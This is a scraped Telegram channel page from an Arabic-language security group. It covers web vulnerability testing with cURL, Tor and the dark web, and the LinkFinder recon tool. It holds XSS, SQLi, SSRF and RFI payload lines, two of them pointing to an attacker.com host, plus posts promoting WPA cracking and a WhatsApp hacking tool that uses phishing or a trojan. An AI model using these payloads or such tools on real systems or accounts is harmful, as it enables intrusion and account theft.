cookie

Sizning foydalanuvchi tajribangizni yaxshilash uchun cookie-lardan foydalanamiz. Barchasini qabul qiling», bosing, cookie-lardan foydalanilishiga rozilik bildirishingiz talab qilinadi.

avatar

Arise Security 2

إشعار إخلاء المسؤولية: يرجى ملاحظة أن المعلومات الواردة في هذه القناة هي لأغراض تعليمية وترفيهية تم إجراء كل محاولة لتقديم معلومات دقيقة ومحدثة وموثوقة وكاملة مزيد من المعلومات التي نقدمها : [Blue24Bluer](https://blue24bluer.netlify.app) @Blue24Bluer

Ko'proq ko'rsatish
Reklama postlari
692
Obunachilar
-324 soatlar
-47 kunlar
+530 kunlar

Ma'lumot yuklanmoqda...

Obunachilar o'sish tezligi

Ma'lumot yuklanmoqda...

ثغرات أمنية شائعة وفحصها باستخدام cURL 1. XSS (Cross-Site Scripting) تعد ثغرة XSS من الثغرات الشائعة في تطبيقات الويب، حيث يُسمح للمهاجم بتضمين وتنفيذ برمجة نصية على جانب العميل (المتصفح). يمكن استغلال هذه الثغرة لسرقة معلومات المستخدم أو تنفيذ أوامر ضارة. طريقة فحص XSS باستخدام cURL: يمكن استخدام cURL لإرسال طلب GET أو POST وتضمين برمجة نصية ضارة في المعلمات. على سبيل المثال:
curl -X GET 'https://example.com/page.php?param=<script>alert("XSS")</script>'
تستبدل https://example.com/page.php?param=<script>alert("XSS")</script> بعنوان URL لصفحة الويب المستهدفة وتتضمن سلسلة نصية تحتوي على جزء البرمجة النصيّة <script>alert("XSS")</script>. 2. SSRF (Server-Side Request Forgery) ثغرة SSRF تسمح للمهاجم بإجبار الخادم على إجراء طلبات إلى موارد أخرى على الشبكة بدلاً من المصادر المتوقعة. يمكن استخدامها للوصول غير المصرح به إلى موارد أو أنظمة داخلية. طريقة فحص SSRF باستخدام cURL: يمكن استخدام cURL لإرسال طلب GET أو POST مع تعيين معلمة URL المستهدفة إلى عنوان URL مشبوه. على سبيل المثال:
curl -X GET 'https://example.com/page.php?url=http://attacker.com/malicious'
تستبدل https://example.com/page.php?url=http://attacker.com/malicious بعنوان URL لصفحة الويب المستهدفة وتتضمن المعلمة url التي تقوم بإرسال الطلب إلى عنوان URL المشبوه http://attacker.com/malicious. 3. RFI (Remote File Inclusion) ثغرة RFI تسمح للمهاجم بتضمين وتنفيذ ملفات عن بُعد داخل تطبيق ويب. يمكن استغلالها لاستدعاء ملفات خارجية وتنفيذها على الخادم. طريقة فحص RFI باستخدام cURL: يمكن استخدام cURL لإرسال طلب GET أو POST لاستدعاء الملف عن بُعد. على سبيل المثال:
curl -X GET 'https://example.com/page.php?file=https://attacker.com/malicious.php'
تستبدل https://example.com/page.php?file=https://attacker.com/malicious.php بعنوان URL لصفحة الويب المستهدفة وتتضمن المعلمة "file" التي تحتوي على العنوان URL المشبوه "https://attacker.com/malicious.php". ثغرة SQLi (SQL Injection) هي ثغرة أمنية شائعة تسمح للمهاجم بحقن أوامر SQL ضارة داخل إدخالات التطبيقات التفاعلية لقواعد البيانات. يعتبر SQLi خطيرًا لأنه يمكن أن يؤدي إلى استخراج معلومات حساسة من قواعد البيانات أو تعديلها أو حذفها. طريقة فحص SQLi باستخدام cURL: عند استخدام cURL لفحص ثغرة SQLi، يمكنك تضمين أوامر SQL ضارة كقيم للمعلمات. على سبيل المثال:
curl -X GET 'https://example.com/page.php?id=1%20OR%201=1'
تستبدل https://example.com/page.php?id=1%20OR%201=1 بعنوان URL لصفحة الويب المستهدفة وتتضمن المعلمة "id" وقيمة مشبوهة مثل 1 OR 1=1. في هذا المثال، يتم إضافة الجزء 1 OR 1=1 إلى المعلمة "id"، وهذا يعد استفسارًا SQL غير آمن. إذا كان التطبيق معرضًا لثغرة SQLi، فقد يؤدي ذلك إلى عرض جميع السجلات في جدول قاعدة البيانات بدلاً من تحديد سجل واحد فقط.
Hammasini ko'rsatish...
Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.

1
الإنترنت المظلم (Dark Web) هو جزء من الإنترنت العميق (Deep Web)، وهو تجمع غير مرئي من المواقع والخدمات التي لا يمكن الوصول إليها بسهولة باستخدام محركات البحث التقليدية. يمكن تعريف الإنترنت المظلم بأنه مجموعة من الشبكات والمواقع التي تستخدم بروتوكول التوجيه المتعدد الطبقات (Onion Routing) لتحقيق التشفير والتخفي والتوجيه اللامعروف. تور (Tor) هو تطبيق يستخدم في الإنترنت المظلم لتوفير الخصوصية والتشفير. يعتمد Tor على بروتوكول التوجيه المتعدد الطبقات (Onion Routing)، الذي يتيح توجيه حركة المرور عبر شبكة مختلفة من الخوادم المشفرة بطريقة تجعل من الصعب تتبع مصدر المرور. يقوم Tor بتشفير بيانات المستخدم وإرسالها عبر عدة خوادم (عقد) في الشبكة قبل وصولها إلى وجهتها النهائية، مما يجعل من الصعب تتبع مسار الاتصال وتحديد هوية المستخدم. بروتوكول Onion هو البروتوكول الذي يتيح تشفير وتوجيه حركة المرور في شبكة Tor. يتم تشفير حزم البيانات بطريقة متعددة الطبقات، حيث يتم إضافة طبقة من التشفير لكل عقد تمر به حزمة البيانات. عندما تصل حزمة البيانات إلى عقد في الشبكة، يتم إزالة طبقة التشفير الخاصة به، مما يجعل من الصعب للغاية تتبع مسار الحركة وتحديد مصدرها الأصلي. العملة الرسمية في الإنترنت المظلم هي البيتكوين (Bitcoin). البيتكوين هي عملة رقمية مشفرة تعتمد على التكنولوجيا المعروفة بالبلوكشين (Blockchain). تستخدم البيتكوين في الإنترنت المظلم بسبب ميزاتها الرقمية والمجهولة، حيث يصعب تتبع وتتبع المعاملات المالية التي تتم باستخدامها. SOCKS5 هو بروتوكول لتوجيه حركة المرور في شبكات الكمبيوتر. يستخدم بشكل شائع في تقنيات الحفاظ على الخصوصية وتجاوز الحجب على الإنترنت. يعمل بروتوكول SOCKS5 عن طريق توجيه حركة المرور بين العميل والخادم عبر عدة طبقات من التشفير، مما يوفر حمستوى إضافي من الخصوصية ويمكن أن يتيح الوصول إلى الموارد المحجوبة. يعمل بروتوكول SOCKS5 على مستوى الطبقة الخامسة في نموذج OSI (Open Systems Interconnection) ويدعم عدة بروتوكولات لتوجيه حركة المرور بما في ذلك TCP (Transmission Control Protocol) وUDP (User Datagram Protocol). يعمل SOCKS5 كخادم وكيل يقوم بتوجيه حركة المرور بين العميل والخادم بناءً على طلبات الاتصال التي يتلقاها. باستخدام SOCKS5، يقوم العميل بتكوين اتصال مع الخادم الوكيل SOCKS5 ويطلب منه توجيه حركة المرور إلى الخادم النهائي الذي يرغب في الوصول إليه. الخادم الوكيل يتلقى طلب الاتصال ويقوم بإعادة توجيه المرور بين العميل والخادم النهائي بشكل شفاف ومجهول. هذا يسمح للعميل بالتخفي وتجاوز القيود أو الحجب المفروض على الاتصال بالخوادم.
Hammasini ko'rsatish...
أداة cURL هي أداة سطر الأوامر الشهيرة ومتعددة الاستخدامات في أنظمة Linux. تعتبر cURL أداة قوية لإجراء طلبات HTTP واستعراض محتوى الويب من سطر الأوامر. توفر cURL واجهة سهلة الاستخدام لإرسال واستقبال البيانات من وإلى الخوادم بشكل فعال. في هذا المقال، سنستكشف استخدامات cURL في أنظمة Linux ونناقش الأهمية العملية لهذه الأداة، بالإضافة إلى التحذيرات المتعلقة باستخدامها في الاختراق وتخمين صفحات الويب. الاستخدامات والأهمية: إدارة واجهة برمجة التطبيقات (API): تعتبر cURL أداة قوية لاختبار واستكشاف واجهات برمجة التطبيقات. يمكن استخدامها لإرسال طلبات GET وPOST و PUT و DELETE إلى الخوادم المضيفة للواجهات، واستعراض البيانات المستجابة. هذا يسهل اختبار وتطوير التطبيقات والتأكد من أن الواجهات تعمل بشكل صحيح. التحميل والتنزيل: يمكن استخدام cURL لتحميل الملفات من الإنترنت أو تنزيلها إلى جهازك بسهولة. يمكنك تنفيذ طلبات التنزيل باستخدام خيارات cURL المناسبة وتحديد المسار المستهدف للملف. الاختبار والتصحيح: يعتبر cURL أداة قوية لاختبار وتصحيح الخوادم والخدمات عبر بروتوكول HTTP. يمكن استخدامه للتحقق من استجابة الخادم، والتحقق من صحة الرموز الاستجابة، وتحليل رؤوس الاستجابة، واكتشاف أخطاء الاتصال والتكوين. الاستعلام عن صفحات الويب: يمكن استخدام cURL للاستعلام عن صفحات الويب واستخراج محتواها. يمكنك إرسال طلبات GET لصفحات الويب المحددة وعرض الرد الذي يتم استرداده من الخادم. الامتثال للقوانين والأنظمة: يجب استخدام cURL وأي أداة أخرى بشكل قانوني وفقًا للقوانين والأنظمة المعمول بها. يُحظر استخدام cURL في أنشطة غير قانونية مثل الاختراق غير المصرح به أو التجسس على الآخرين. الحصول على إذن: قبل استخدام cURL لاختبار الأمان أو تقييم ثغرات النظام، يجب الحصول على إذن صريح من المسؤولين عن النظام أو صاحب الويب. استخدام cURL بدون إذن مسبق يعتبر انتهاكًا للخصوصية والأمان. التعرف على الضعف: يمكن استخدام cURL في تقييم أمان صفحات الويب والتحقق من وجود ثغرات محتملة. ومع ذلك، يرجى استخدامها فقط في سياق الاختبار المصرح به وتجنب استغلال الثغرات واختراق الأنظمة بدون إذن. عدم الاعتماد على cURL فحسب: يجب ألا يعتمد القرارات المتعلقة بأمان وحماية صفحات الويب على نتائج cURL فحسب. يجب أن يكون الاختبار الأمني شاملاً ويشمل أدوات وتقنيات أخرى مثل اختبار الاختراق ومسح الأمان. إرسال طلب GET: يمكنك استخدام cURL لإرسال طلب GET إلى عنوان URL محدد. يمكنك تحقيق ذلك باستخدام الخيار -X GET مع cURL. مثال:
curl -X GET https://example.com
إرسال طلب POST: يمكنك استخدام cURL لإرسال طلب POST وإرسال بيانات محددة إلى الخادم. يمكنك استخدام الخيار -X POST مع cURL وتحديد البيانات المطلوبة باستخدام الخيار -d أو --data. مثال: Copy curl -X POST -d "username=admin&password=123456" https://example.com/login التحميل والتنزيل: يمكنك استخدام cURL لتحميل الملفات من الإنترنت أو تنزيلها إلى جهازك. يمكنك استخدام الخيار -o أو --output لتحديد اسم الملف المستهدف. مثال:
curl -o file.zip https://example.com/file.zip
إرسال رأس الطلب: يمكنك استخدام cURL لإرسال رأس الطلب (HTTP headers) مع طلبك. يمكنك استخدام الخيار -H أو --header لتحديد رأس الطلب. مثال:
curl -H "Authorization: Bearer token123" https://example.com/api
محاكاة المتصفح: يمكنك استخدام cURL لمحاكاة سلوك المتصفح وإرسال طلبات مشابهة لتلك التي يقوم المتصفح بإرسالها. يمكنك استخدام الخيار -A أو --user-agent لتحديد سلسلة User-Agent. مثال:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" https://example.com
Hammasini ko'rsatish...
1
07:04
Video unavailableShow in Telegram
How to crack wpa Network with wifite
Hammasini ko'rsatish...
ParrotOS_Running_Oracle_VM_VirtualBox_1445_10_13_15_12_38.mp4105.04 MB
1🔥 1
نحن فريق ARISE، نسعى لنشر العلم والتوعية في مجال الأمان السيبراني. اكتشف أدوات ARISETools المفيدة والتطبيقات التقنية المثيرة. انضم إلى  ARISEChat على Telegram للتواصل مع أعضاء فريقنا ومشاركة المعرفة والخبرات. انضم إلى مجموعتنا على ARISEWhats وكن جزءًا من مناقشاتنا وتفاعلاتنا. انضم إلى مجموعةنا على ARISEbook واستكشف المحتوى المثير والمناقشات الشيقة. تفضل بزيارة موقع ARISEWeb للاطلاع على معلومات مفيدة وشروحات ممتعة. [Telegram: ARISE](https://t.me/AriseSecurity2) 🔧 ARISETools: اكتشف أدوات ARISETools المفيدة والتطبيقات التقنية المثيرة. انضم إلينا على Telegram هنا: [Telegram: H7Tools](https://t.me/AriseSecurity) 💬 ARISEChat: انضم إلى ARISEChat على Telegram للتواصل مع أعضاء فريقنا ومشاركة المعرفة والخبرات. انضم إلينا هنا: [ARISEChat on Telegram](https://t.me/ARISES_CHAT) 📲 ARISEWhats: انضم إلى مجموعتنا على ARISEWhats وكن جزءًا من مناقشاتنا وتفاعلاتنا. انضم إلينا هنا: [ARISEWhats](https://chat.whatsapp.com/G08B93hrXAT6G6bZXvf9Zh) 📘 ARISEBook: انضم إلى مجموعةنا على Facebook واستكشف المحتوى المثير والمناقشات الشيقة. انضم إلينا هنا: [ARISEbook](https://www.facebook.com/groups/302735109455501/?ref=share)
Hammasini ko'rsatish...
Arise Security 2

إشعار إخلاء المسؤولية: يرجى ملاحظة أن المعلومات الواردة في هذه القناة هي لأغراض تعليمية وترفيهية تم إجراء كل محاولة لتقديم معلومات دقيقة ومحدثة وموثوقة وكاملة مزيد من المعلومات التي نقدمها : [Blue24Bluer](

https://blue24bluer.netlify.app)

@Blue24Bluer

🔥 4
تعد أداة LinkFinder أداة برمجية مكتوبة بلغة Python، وهي مصممة لاكتشاف نقاط النهاية (endpoints) ومعلماتها في ملفات JavaScript. تعد هذه الأداة مفيدة لأخصائيي الاختراق وصائدي الأخطاء لجمع نقاط النهاية الجديدة والمخفية في المواقع التي يقومون باختبارها، مما يوفر فرصًا جديدة لاختبار الأمان وربما اكتشاف ثغرات جديدة. تعمل الأداة عن طريق استخدام jsbeautifier لبيئة Python بالاشتراك مع تعبير عادي كبير الحجم. يتألف التعبير العادي من أربعة تعابير عادية صغيرة، وهي مسؤولة عن العثور على النقاط التالية: 1. روابط كاملة (https://example.com/*) 2. روابط مطلقة أو روابط محددة بالنقاط (/ * أو .. /*) 3. روابط نسبية تحتوي على شرطة واحدة على الأقل (text/test.php) 4. روابط نسبية بدون شرطة (/test.php) يتم توفير النتائج بتنسيق HTML أو نص عادي. كيفية التثبيت: تدعم أداة LinkFinder Python 3. يمكنك تثبيتها على النحو التالي: 1. قم بنسخ الأداة من الرابط التالي: https://github.com/GerbenJavado/LinkFinder.git 2. انتقل إلى المجلد الذي تم تنزيله بواسطة الأمر "cd LinkFinder" 3. قم بتثبيت الأداة باستخدام الأمر "python setup.py install" 4. يعتمد LinkFinder على وحدتي argparse و jsbeautifier في Python. يمكن تثبيت هذه الوحدات باستخدام pip بالأمر "pip3 install -r requirements.txt" كيفية الاستخدام: يمكن استخدام أداة LinkFinder بواسطة تشغيل الأمر "python linkfinder.py" مع الخيارات المناسبة. هنا بعض الأمثلة على الاستخدام: 1. لاكتشاف نقاط النهاية في ملف JavaScript عبر الإنترنت وحفظ النتائج في ملف HTML:

   python linkfinder.py -i https://example.com/1.js -o results.html
   
2. لاكتشاف نقاط النهاية في ملف JavaScript عبر الإنترنت وطباعة النتائج على سطر الأوامر (STDOUT):

   python linkfinder.py -i https://example.com/1.js -o cli
   
3. لتحليل مجموعة كاملة من ملفات JavaScript في مجال معين
Hammasini ko'rsatish...
GitHub - GerbenJavado/LinkFinder: A python script that finds endpoints in JavaScript files

A python script that finds endpoints in JavaScript files - GerbenJavado/LinkFinder

👏 1
ترا التفاعل من حيث التعليقات و الافكار يدعمنا 🙄😒
Hammasini ko'rsatish...
2
Photo unavailableShow in Telegram
almost done *WHO tool for WhatsApp hacking* 🔥🔥
Hammasini ko'rsatish...
1🔥 1👏 1🎉 1
فكرة برمجة اداة اختراق وتساب تمت بالفعل ولكن هناك مشاكل صغيرة ولا تحتسب كمشكلة حقآ 😅 A) إختراق بستخدام الPhishing Attack B) إختراق بستخدام trojan horse ائكد لكم ان كلى الطريقتان مختلفة عن الطرق القديمة 😁Anonymous voting
  • A
  • B
0 votes
Photo unavailableShow in Telegram
كل عام و انتم بخير
Hammasini ko'rsatish...
8
Boshqa reja tanlang

Joriy rejangiz faqat 5 ta kanal uchun analitika imkoniyatini beradi. Ko'proq olish uchun, iltimos, boshqa reja tanlang.